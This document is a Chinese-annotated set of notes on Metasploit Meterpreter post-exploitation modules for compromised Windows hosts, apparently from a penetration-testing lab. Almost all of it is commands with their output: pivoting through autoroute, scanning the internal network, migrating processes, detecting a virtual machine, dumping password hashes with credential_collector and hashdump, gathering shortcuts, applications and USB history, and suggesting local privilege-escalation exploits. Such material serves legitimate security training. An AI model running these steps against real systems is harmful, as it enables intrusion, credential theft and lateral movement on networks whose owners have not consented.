参考:
https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/
autoroute
这个很重要啊!
The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to pivot deeper into a target network.
meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD
[*] Running module against V-MAC-XP
[*] Adding a route to 192.168.218.0/255.255.255.0...
meterpreter >
Background session 5? [y/N] y
之后就可以通过这个路由,来进一步渗透了。
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24
RHOSTS => 192.168.218.0/24
msf auxiliary(tcp) > set THREADS 50
THREADS => 50
msf auxiliary(tcp) > set PORTS 445
PORTS => 445
msf auxiliary(tcp) > run
[*] Scanned 027 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] 192.168.218.136:445 - TCP OPEN
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 210 of 256 hosts (082% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
migrate
The “migrate” post module will migrate to a specified process or if none is given, will automatically spawn a new process and migrate to it.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1092)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 672
[*] New server process: Explorer.EXE (672)
meterpreter >
checkvm(检测是否在虚拟机中)
checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.
meterpreter > run post/windows/gather/checkvm
[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >
credential_collector(收集机密信息)
harvests passwords hashes and tokens on the compromised host.
meterpreter > run post/windows/gather/credentials/credential_collector
[*] Running module against V-MAC-XP
[+] Collecting hashes...
Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
dumplinks(导出存在的快捷方式)
The “dumplinks” module parses the .lnk files in a users Recent Documents which could be useful for further information gathering.Note that, as shown below, we first need to migrate into a user process prior to running the module.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks
[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >
enum_applications(列举出安装的应用)
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN7-X86
Installed Applications
======================
Name Version
---- -------
Adobe Flash Player 25 ActiveX 25.0.0.148
Google Chrome 58.0.3029.81
Google Update Helper 1.3.33.5
Google Update Helper 1.3.25.11
Microsoft .NET Framework 4.6.1 4.6.01055
Microsoft .NET Framework 4.6.1 4.6.01055
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148
MySQL Connector Net 6.5.4 6.5.4
Security Update for Microsoft .NET Framework 4.6.1 (KB3122661) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3127233) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2) 2
Security Update for Microsoft .NET Framework 4.6.1 (KB3142037) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3143693) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3164025) 1
Update for Microsoft .NET Framework 4.6.1 (KB3210136) 1
Update for Microsoft .NET Framework 4.6.1 (KB4014553) 1
VMware Tools 10.1.6.5214329
XAMPP 1.8.1-0 1.8.1-0
[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txt
meterpreter >
hashdump
The “hashdump” post module will dump the local users accounts on the compromised host using the registry.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
meterpreter >
usb_history
The “usb_history” module enumerates the USB drive history on the compromised system.
meterpreter > run post/windows/gather/usb_history
[*] Running module against V-MAC-XP
[*]
C: Disk ea4cea4c
E: STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
A: FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
Disk lpftLastWriteTime Thu Apr 21 13:09:42 -0600 2011
Volume lpftLastWriteTime Thu Apr 21 13:09:43 -0600 2011
Manufacturer (Standard disk drives)
ParentIdPrefix 8&3a01dffe&0 ( E:)
Class DiskDrive
Driver {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
meterpreter >
local_exploit_suggester
查看还有哪些可以exploit的点?
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on.
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf post(local_exploit_suggester) > run
[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed